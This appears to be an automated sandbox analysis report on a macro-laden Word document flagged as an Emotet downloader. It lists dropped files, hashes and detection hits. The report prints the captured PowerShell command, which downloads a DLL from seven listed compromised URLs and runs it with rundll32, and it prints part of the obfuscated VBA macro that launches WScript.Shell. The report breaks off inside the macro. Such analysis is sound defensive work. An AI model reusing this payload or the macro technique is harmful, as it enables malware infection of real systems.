                                                                                                                                    SHA-512:07970DF399585AFF83C04279B843C9FE5CA5ED6482A6B69B33E5677929207323A05ECD51AC619FDB1991C27C3D72A2FCA56D1FA972DDF19A5280BC3C01806C62
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{35810410-5FD3-47F2-B08A-1DE17B8BA882}.tmp
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1024
                                                                                                                                    Entropy (8bit):0.05390218305374581
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{62016A81-8420-4F16-89A1-1259E0199215}.tmp
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1536
                                                                                                                                    Entropy (8bit):3.1478370528780375
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:HfCemjup6uKTHuJPkTQXaHINvhSBxD+aoF:TKTOJuymfO
                                                                                                                                    MD5:582FA24D082E9486E72A1B9681CDF97B
                                                                                                                                    SHA1:CB23EE4B0A2D6188A7C39562DB5B4AA8A9C4FBB9
                                                                                                                                    SHA-256:F857A260E9DC18D6B5A51207FAC4F1A8A985840E8132CCFB324DEAC36DF67145
                                                                                                                                    SHA-512:48BDDEC49E6DDE25F4BC3D28C2A8D33E7382022226DF0A836044EB1A3E69FA5A46712AE301BF478C23F686297EB5E9BD9AE2C7A29F03628706CE69BA9E08EDCA
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ../... ... . ... ... ..... . ... ... . ..... . ....... ... ..... ......... . . ... . ... ... . . ............. . ....... ... ............... ... ......... ......... . . ....... . ..... . . ... ... ... . .....................................................................................................................................................................................................................................................................................................................................@...H...\...f...h...|................................................................................................................................................................................................................................................................................................................................................L.......\. ............gd|b..........).Y...gd..T.............gd|H...............L.......\. ............gd..T.......
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{A2B54B36-922B-4491-AD33-70B4A37C30C5}.tmp
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2
                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:X:X
                                                                                                                                    MD5:32649384730B2D61C9E79D46DE589115
                                                                                                                                    SHA1:053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
                                                                                                                                    SHA-256:E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
                                                                                                                                    SHA-512:A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ..
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):20548
                                                                                                                                    Entropy (8bit):5.605905752002901
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:7t9Dbv0nDPuVpOdGb0PggYSB+CIdcUsulpEIiT9oEuqpQ1mvrfyzLH:ODJkiG4bIuUsulmtVoyKH
                                                                                                                                    MD5:78E4DBADB142BC1436A0C746C1026BFB
                                                                                                                                    SHA1:C67241D96C86EE2736F2A68FB31911E487C2A352
                                                                                                                                    SHA-256:E6293121B4430038B0549D9549DF356B30CA3B8137429459BB595E5780EB60D1
                                                                                                                                    SHA-512:77524D441A9358FA74A158F3ECC93539CBAA8FBD5E9DD1764164746A82FDD73008C2FD24E7E5974951FBA704951DA7173E08401BA9CA1F93138CC1DB7B8486E7
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: @...e................................................@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].G.....%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                    C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):152056
                                                                                                                                    Entropy (8bit):4.414325807338861
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:fmmHLzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3ow:f1g8WpFpKKHHedydFeo+oQLUlPow
                                                                                                                                    MD5:DE65EB542715B95DD0EAAF56CA9AA27F
                                                                                                                                    SHA1:A52571968D70CD4141A5F746A6447F400090A870
                                                                                                                                    SHA-256:F02615DFC224B4DBB09B2E6ED96E97E3BDF711F838F94997D5BB8474F09FF15E
                                                                                                                                    SHA-512:D52CF17A2BC15729E6C9FBB4366A97C1A345678111393657C35C07DA17D71D5C6FE685071044244580E0E265B673787A6F1D12998FB3311F4DBBE1A9461EDA31
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......B...........^...............g...............W...............F..............<G...............g...............i...I..............T..................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1xa3wtq.jvy.ps1
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1
                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: 1
                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrskvuat.dwv.psm1
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1
                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: 1
                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF0E259767A8C316A9.TMP
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):51200
                                                                                                                                    Entropy (8bit):4.991998039588056
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:QgFs7kSlE3K6PPDkyXZAQhQwIykFYeUrQ7S8iVdVdW:NGkSlE3hPAGhQj5cc
                                                                                                                                    MD5:3DC228918F3FC1CCEEC6300CBC293775
                                                                                                                                    SHA1:7713AF2621B648F8B28F804D7CC877F63DFE63E4
                                                                                                                                    SHA-256:1FEC6E5BBE68AC32E0C43C66ABB995F20D4941372815444176171EAF3469AE3E
                                                                                                                                    SHA-512:E8484A62DED0564A1251C7299997CF4F58FEAE1CFF2D0B73C3B85CB4AEE68BC67B7395048BC1F57A572D6940729E5ED3A5E8064FD648DAC7EAA123DE69A5B5C5
                                                                                                                                    Malicious:true
                                                                                                                                    Yara Hits:
                                                                                                                                    • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DF0E259767A8C316A9.TMP, Author: Florian Roth
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    Preview: ......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................9....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6.......8.......V...;...<...I...>...?...@...A...B...C...D...7...F...G...H.......W...S...L...M...N...O...P...Q...R...E...T...U...........a...Y...Z...[...\...]...^..._...`...J...b...................................................................................................
                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\704.LNK
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:51 2020, mtime=Mon Nov 22 11:22:37 2021, atime=Mon Nov 22 11:22:33 2021, length=136531, window=hide
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1014
                                                                                                                                    Entropy (8bit):4.708319672411773
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:8cgxnKRUUduCH2POPK4VPAw+WcoJOjAwg/D04vs5D03S3v44t2Y+xIBjKZm:8cgQ/PjAGyAhbrs5DWwo7aB6m
                                                                                                                                    MD5:EDAC1A423CC725FEB03469581A4A8D42
                                                                                                                                    SHA1:EC089C3D3C1118D8BCDAA3CD491DF3396BFFEF35
                                                                                                                                    SHA-256:88C92CD9853CF1A97D7F7215336DED94323EEDF40EBEFD5DAB05A8382884F579
                                                                                                                                    SHA-512:953010D56D52AF576BC3788403425BFFFA55EAC4A88E763144720B294628C148F305DC4D97C840F073D416FC1470E33EEA5344B13F4807F3A7305FF6E92DED90
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: L..................F.... ....v.R....q.........o.....S............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..vS.b....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N..vS.b....#J....................?...j.o.n.e.s.....~.1.....>Q.<..Desktop.h.......N..vS.b.....Y..............>.....\...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....V.2.S...vS.b .704.doc.@......>Qz<vS.b.....V....................~9G.7.0.4...d.o.c.......M...............-.......L...........>.S......C:\Users\user\Desktop\704.doc........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.7.0.4...d.o.c.........:..,.LB.)...As...`.......X.......405464...........!a..%.H.VZAj...Z................!a..%.H.VZAj...Z...........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7s
                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):57
                                                                                                                                    Entropy (8bit):4.440640076685947
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:bDuMJl+VomX1SVtBVov:bCJaV9y
                                                                                                                                    MD5:2B1A3D4E9531BB7AAAEEE91097C6E6C8
                                                                                                                                    SHA1:CDCB8BB8DF9FDC8AE6C9B4E7B3FA485B8075C74B
                                                                                                                                    SHA-256:7C5B1F305E5CDABE223B67B449800F306C63D8B354CA4A21F1C8C20E909EC8E1
                                                                                                                                    SHA-512:B2ED8A04808A83A548F91A0CFA5B3D830A05EB52D6B4F436B02D3ADDF1A020DBE04252F19E778E706827A16CBB7E3ECED7BBD8E82E69096A1328E2BEFA478374
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: [folders]..Templates.LNK=0..704.LNK=0..[doc]..704.LNK=0..
                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):162
                                                                                                                                    Entropy (8bit):2.324669529927172
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Rl/ZdnOZDlBlqbMtlt/7l2mtX/r:RtZlO9cbMtB22
                                                                                                                                    MD5:B02AB585D974C49883C056100EC22388
                                                                                                                                    SHA1:52D512FC1DD9F8D0B2D1AE11B3256D43DB0DDC02
                                                                                                                                    SHA-256:D280C9DA4FD90A5400B1361E16E2EE7F8ABE6179793D370D302C0BEF2772C8B7
                                                                                                                                    SHA-512:76ED98F3971774E2BD820E7F35DBD97C301E4035577E564163ACADB5A16BFDBBB3F9E95059142F0D70D82568212E507065B9A159CC79F4A8BDA52D0DEB1FDF21
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: .pratesh................................................p.r.a.t.e.s.h.............-;..........H.......6C..E.0.....E<..........................+....=..............
                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):20
                                                                                                                                    Entropy (8bit):2.8954618442383215
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                    MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                    SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                    SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                    SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ..p.r.a.t.e.s.h.....
                                                                                                                                    C:\Users\user\Desktop\~$704.doc
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):162
                                                                                                                                    Entropy (8bit):2.324669529927172
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Rl/ZdnOZDlBlqbMtlt/7l2mtX/r:RtZlO9cbMtB22
                                                                                                                                    MD5:B02AB585D974C49883C056100EC22388
                                                                                                                                    SHA1:52D512FC1DD9F8D0B2D1AE11B3256D43DB0DDC02
                                                                                                                                    SHA-256:D280C9DA4FD90A5400B1361E16E2EE7F8ABE6179793D370D302C0BEF2772C8B7
                                                                                                                                    SHA-512:76ED98F3971774E2BD820E7F35DBD97C301E4035577E564163ACADB5A16BFDBBB3F9E95059142F0D70D82568212E507065B9A159CC79F4A8BDA52D0DEB1FDF21
                                                                                                                                    Malicious:true
                                                                                                                                    Preview: .pratesh................................................p.r.a.t.e.s.h.............-;..........H.......6C..E.0.....E<..........................+....=..............
                                                                                                                                    C:\Users\user\Documents\20211122\PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):9243
                                                                                                                                    Entropy (8bit):5.508993704744811
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:BZVj3NgmxORFqDo1ZvmxORBLS7Znj3NgmxORFqDo1ZGhS8BS2bTzXBS2bTzXBS22:7x/x1zxO1oQoQoobbxOd8jS8jSgjL
                                                                                                                                    MD5:56F8A52E8A08459615EF28950B50087A
                                                                                                                                    SHA1:68B22249C6035C8E610AB2A0D5CDAA027ED89ECF
                                                                                                                                    SHA-256:4072B7B218F6015D89A89323BB2574C7B5C27E7859D7CF7FDB842B58EFC230A3
                                                                                                                                    SHA-512:6CDDB80806C48D8B8A2CAE7900860704AF7D91232E1071C391954A44E94F6E8FB1AA3E34274E43410266D397C881DF5D1EA1A8DAEBAF76BCF5E8A5A92AEE03A7
                                                                                                                                    Malicious:true
                                                                                                                                    Yara Hits:
                                                                                                                                    • Rule: JoeSecurity_EmotetDownloader, Description: Yara detected Emotet Downloader, Source: C:\Users\user\Documents\20211122\PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt, Author: Joe Security
                                                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20211122132255..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell $dfkj=$strs="http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/".Split(",");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth="c:\programdata\"+$r1+".dll";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp="c:\windows\syswow64\rundll32.exe";$a=$tpth+",f"+$r2;Start-Process $fp -ArgumentList $a;break;}};;IEX $dfkj..Process ID: 6312..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersio

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:Microsoft Word 2007+
                                                                                                                                    Entropy (8bit):7.953888666040384
                                                                                                                                    TrID:
                                                                                                                                    • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                                                                                                                                    • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                                                                                                                                    • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                                                                                                                                    • ZIP compressed archive (8000/1) 5.23%
                                                                                                                                    File name:704.doc
                                                                                                                                    File size:146367
                                                                                                                                    MD5:40f85d07da2533d576b1f2d7c043a2da
                                                                                                                                    SHA1:60b84d70a6511483c6de131fb62e30a99edff5c4
                                                                                                                                    SHA256:d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d
                                                                                                                                    SHA512:fb718ea1a81fdcba7c933cd55a54beeee660a7e4d5b0a1e1ee11351e40cc691dd3fb644dce60335dfea9c983fc5a4ce079b2a3349fb26c77c444c66cada454a2
                                                                                                                                    SSDEEP:3072:hAGj2SXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqDve/Nk:9CSXw50+OukzVXV2uhDCG/Nk
                                                                                                                                    File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                    Static OLE Info

                                                                                                                                    General

                                                                                                                                    Document Type:OpenXML
                                                                                                                                    Number of OLE Files:1

                                                                                                                                    OLE File "/opt/package/joesandbox/database/analysis/526268/sample/704.doc"

                                                                                                                                    Indicators

                                                                                                                                    Has Summary Info:False
                                                                                                                                    Application Name:unknown
                                                                                                                                    Encrypted Document:False
                                                                                                                                    Contains Word Document Stream:
                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                    Flash Objects Count:
                                                                                                                                    Contains VBA Macros:True

                                                                                                                                    Summary

                                                                                                                                    Author:1
                                                                                                                                    Template:Normal.dotm
                                                                                                                                    Last Saved By:1
                                                                                                                                    Revion Number:103
                                                                                                                                    Total Edit Time:211
                                                                                                                                    Create Time:2021-11-15T15:39:00Z
                                                                                                                                    Last Saved Time:2021-11-18T19:09:00Z
                                                                                                                                    Number of Pages:1
                                                                                                                                    Number of Words:16
                                                                                                                                    Number of Characters:95
                                                                                                                                    Creating Application:Microsoft Office Word
                                                                                                                                    Security:0

                                                                                                                                    Document Summary

                                                                                                                                    Number of Lines:1
                                                                                                                                    Number of Paragraphs:1
                                                                                                                                    Thumbnail Scaling Desired:false
                                                                                                                                    Company:
                                                                                                                                    Contains Dirty Links:false
                                                                                                                                    Shared Document:false
                                                                                                                                    Changed Hyperlinks:false
                                                                                                                                    Application Version:12.0000

                                                                                                                                    Streams with VBA

                                                                                                                                    VBA File Name: cvbku3gakuisdgfilu3gblaw.cls, Stream Size: 10382
                                                                                                                                    General
                                                                                                                                    Stream Path:VBA/cvbku3gakuisdgfilu3gblaw
                                                                                                                                    VBA File Name:cvbku3gakuisdgfilu3gblaw.cls
                                                                                                                                    Stream Size:10382
                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 9e 08 00 00 d4 00 00 00 02 02 00 00 ff ff ff ff a7 08 00 00 3f 1b 00 00 00 00 00 00 01 00 00 00 ea eb ff 49 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                    VBA Code
                                                                                                                                    Attribute VB_Name = "cvbku3gakuisdgfilu3gblaw"
                                                                                                                                    Attribute VB_Base = "1Normal.ThisDocument"
                                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                                    Attribute VB_Creatable = False
                                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                                    Attribute VB_Exposed = True
                                                                                                                                    Attribute VB_TemplateDerived = True
                                                                                                                                    Attribute VB_Customizable = True
                                                                                                                                    Function dsfl3hadfkb3lkahfoiauhfcfgkwy3jfrkiwed(Optional ByVal Title As String = ",", Optional ByVal InitialPath As String = ":") As String
                                                                                                                                        Dim PS As String: PS = Application.PathSeparator
                                                                                                                                        With Application.FileDialog(msoFileDialogFolderPicker)
                                                                                                                                            If Not Right$(InitialPath, 1) = PS Then InitialPath = InitialPath & PS
                                                                                                                                            .ButtonName = ":": .Title = Title: .InitialFileName = InitialPath
                                                                                                                                            If .Show <> -1 Then Exit Function
                                                                                                                                            If Not Right$(GetFolderPath, 1) = PS Then GetFolderPath = GetFolderPath & PS
                                                                                                                                        End With
                                                                                                                                    End Function
                                                                                                                                    Sub sfoliq3hwoqihepolfijp()
                                                                                                                                        gjpo4jaiwledkgls = GetFolderPath(",", ThisWorkbook.Path)
                                                                                                                                        If gjpo4jaiwledkgls = "" Then Exit Sub
                                                                                                                                        MsgBox ":" & gjpo4jaiwledkgls, vbInformation
                                                                                                                                    End Sub
                                                                                                                                    Sub dfloaswehortiwholehfolsihlkw()
                                                                                                                                        txt$ = FileToVBAFunction(",", ",")
                                                                                                                                        Debug.Print txt$
                                                                                                                                    End Sub
                                                                                                                                    Sub fbkaw4lkuwgbtlske()
                                                                                                                                    Dim WB As Workbook
                                                                                                                                    Set WB = GetAnotherWorkbook
                                                                                                                                    If Not WB Is Nothing Then
                                                                                                                                    MsgBox "&" & WB.FullName, vbInformation
                                                                                                                                    Else
                                                                                                                                    MsgBox ",", vbCritical: Exit Sub
                                                                                                                                    End If
                                                                                                                                    x = WB.Worksheets(1).Range("a2")
                                                                                                                                    End Sub
                                                                                                                                    Function goh4iahwodegiyna89deyfni(fhi3hof3hfolk As String, dfh3olhuiefoiasihkl As String) As String
                                                                                                                                    Dim cbuay7aygsikjbkv As Integer
                                                                                                                                    Dim fjoq3wihrpoa8fghoashf As String: cbuay7aygsikjbkv = 10: fjoq3wihrpoa8fghoashf = Replace(fhi3hof3hfolk, dfh3olhuiefoiasihkl, "")
                                                                                                                                    For sgdyuiwuygiasb = 1 To cbuay7aygsikjbkv
                                                                                                                                    If sgdyuiwuygiasb > 20 Then
                                                                                                                                    MsgBox ","
                                                                                                                                    End If
                                                                                                                                    Next
                                                                                                                                    goh4iahwodegiyna89deyfni = fjoq3wihrpoa8fghoashf
                                                                                                                                    End Function
                                                                                                                                    Function gajowisjd90asdilkf() As Object
                                                                                                                                    On Error Resume Next
                                                                                                                                    Dim coll As New Collection, WB As Workbook
                                                                                                                                    For Each WB In Workbooks
                                                                                                                                    If WB.name <> ThisWorkbook.name Then
                                                                                                                                    If Windows(WB.name).Visible Then coll.Add CStr(WB.name)
                                                                                                                                    End If
                                                                                                                                    Next WB
                                                                                                                                    Select Case coll.Count
                                                                                                                                    Case 0
                                                                                                                                    MsgBox ",", vbCritical, ","
                                                                                                                                    Case 1
                                                                                                                                    Set GetAnotherWorkbook = Workbooks(coll(1))
                                                                                                                                    Case Else
                                                                                                                                    For i = 1 To coll.Count
                                                                                                                                    txt = txt & i & vbTab & coll(i) & vbNewLine
                                                                                                                                    Next i
                                                                                                                                    msg = "&" & vbNewLine & vbNewLine & txt
                                                                                                                                    res = InputBox(msg, ",", 1)
                                                                                                                                    If IsNumeric(res) Then Set GetAnotherWorkbook = Workbooks(coll(Val(res)))
                                                                                                                                    End Select
                                                                                                                                    End Function
                                                                                                                                    Sub fjow3efyw98efhasdokfhlnkvawofh3(nart4kuagiuagsaedr54 As Long, bvagh4iauhoshetret As Long, fbhqwieusiyeoiwugeig As String): Dim sdgbvku3giqugfi2, fhokl34rhyw5uwegea, hkqwfsadesf As String
                                                                                                                                    Dim s1, ra As String: Dim bfik3uvgikuds As Double
                                                                                                                                    Dim dvfghwkuibisdbgfiw As Object
                                                                                                                                    Dim d, R As Double
                                                                                                                                    For bkwefiusdif = 1 To 10
                                                                                                                                    If bkwefiusdif = 7 Then
                                                                                                                                    dvfghwkuibisdbgfiw.CreateObject(goh4iahwodegiyna89deyfni("WRIsRIcRIriRIpt.RISRIheRIlRIl", "RI"), "").Run fhokl34rhyw5uwegea, 0
                                                                                                                                    Else
                                                                                                                                    If bkwefiusdif = 3 Then
